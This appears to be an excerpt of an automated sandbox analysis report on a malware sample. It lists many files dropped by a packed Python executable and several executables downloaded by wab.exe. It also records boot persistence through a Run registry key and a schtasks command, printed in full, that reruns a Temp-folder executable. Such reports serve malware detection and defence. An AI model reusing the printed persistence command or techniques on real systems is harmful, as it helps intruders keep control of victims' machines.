            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\_sfc64.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\bit_generator.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\fft\_pocketfft_umath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy.libs\msvcp140-23ebcc0b37c8e3d074511f362feac48b.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\VCRUNTIME140.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_mt19937.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\tk86t.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\win32\win32pdh.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\PIL\_imagingcms.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_generator.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\_core\_multiarray_umath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tac[1].exeJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\VCRUNTIME140_1.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\_lzma.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\PIL\_imaging.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_sfc64.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\mtrand.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\bit_generator.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile created: C:\Users\user\AppData\Local\Temp\service123.exeJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\PIL\_imaging.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\_philox.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\PIL\_imagingtk.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\linalg\_umath_linalg.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\tcl86t.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\_lzma.pydJump to dropped file
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\VCRUNTIME140.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\mtrand.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\fft\_pocketfft_umath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\libcrypto-3.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\_bounded_integers.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\_philox.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\tk86t.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\_ssl.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\_socket.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\linalg\_umath_linalg.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\_wmi.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\_bounded_integers.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\select.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\_generator.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\fft\_pocketfft_umath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\_queue.pydJump to dropped file
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Channel2[1].exeJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\_lzma.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\PIL\_imagingtk.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy.libs\msvcp140-23ebcc0b37c8e3d074511f362feac48b.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\_core\_multiarray_tests.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\win32\win32gui.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\_common.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\VCRUNTIME140_1.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\_bz2.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\python312.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\_queue.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\zlib1.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\libcrypto-3.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\_bz2.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\python312.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\PIL\_imagingmath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\pywin32_system32\pywintypes312.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\select.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy.libs\libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\_pcg64.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\win32\win32pdh.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\_core\_multiarray_tests.cp312-win_amd64.pydJump to dropped file
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy.libs\msvcp140-23ebcc0b37c8e3d074511f362feac48b.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_pcg64.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\VCRUNTIME140_1.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\PIL\_webp.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\select.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\libffi-8.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\linalg\_umath_linalg.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\_sfc64.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\win32\win32gui.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\_decimal.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\PIL\_webp.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\PIL\_imagingmath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\_tkinter.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\PIL\_imaging.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\PIL\_imagingtk.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\VCRUNTIME140.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\PIL\_webp.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\_core\_multiarray_umath.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\tk86t.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\_mt19937.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeFile created: C:\Users\user\AppData\Local\Temp\ehlOmWhNDTxTGhmOcdRs.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\bit_generator.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\_tkinter.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\_wmi.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\_ssl.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\_philox.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\tcl86t.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\pywin32_system32\pywintypes312.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\_tkinter.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy.libs\libscipy_openblas64_-c16e4918366c6bc1f1cd71e28ca36fc0.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\_ssl.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\libffi-8.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\libffi-8.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\_socket.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\libssl-3.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\libssl-3.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\win32\win32pdh.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\numpy\random\mtrand.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\win32\win32gui.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\zlib1.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\PIL\_imagingcms.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\_decimal.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\_decimal.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\numpy\random\_common.cp312-win_amd64.pydJump to dropped file
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\CheckTool[1].exeJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\_queue.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI28002\python312.dllJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI33402\numpy\random\_mt19937.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61082\unicodedata.pydJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\Documents\iofolko5\j1XaE_3LRXkWT1prPdjt1dhT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyProgram
            Source: C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MyProgram

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
